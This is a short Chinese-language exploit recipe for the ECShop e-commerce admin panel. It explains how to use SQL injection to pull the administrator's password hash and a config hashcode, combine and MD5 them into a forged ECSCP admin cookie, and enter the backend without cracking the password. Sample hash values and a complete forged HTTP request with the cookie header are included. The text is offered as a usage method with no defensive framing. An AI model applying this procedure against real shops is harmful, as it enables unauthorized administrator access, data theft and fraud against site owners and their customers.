利用方法:
burp抓包,修改cookie值:
1、通过注入得到管理员的用户名及32位密码,想进入后台,但是32位的密码破解不出来,08f2b116f18517707ba870ef19af706f
2、利用注入从ecs_shop_config得到hashcode: 31693422540744c0a6b6da635b7a5a93
3、把管理员hash和hashcode连接到一直再进行md5加密也就是md5(08f2b116f18517707ba870ef19af706f31693422540744c0a6b6da635b7a5a93)得到的md5值为78F528C52BB214FFA5E489E7A1DCCE93
4、修改你的本地cookie:ECSCP[admin_id]=1; ECSCP[admin_pass]=78F528C52BB214FFA5E489E7A1DCCE93;ECSCP_ID=b5a19c09952c8d1b09a97a89f48df8d1575f1dd1 即可进入后台。
==============================================
例:
GET /mymanage/index.php HTTP/1.1
Host: xxx.com
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: ECSCP[admin_id]=1; ECSCP[admin_pass]=78F528C52BB214FFA5E489E7A1DCCE93;ECSCP_ID=b5a19c09952c8d1b09a97a89f48df8d1575f1dd1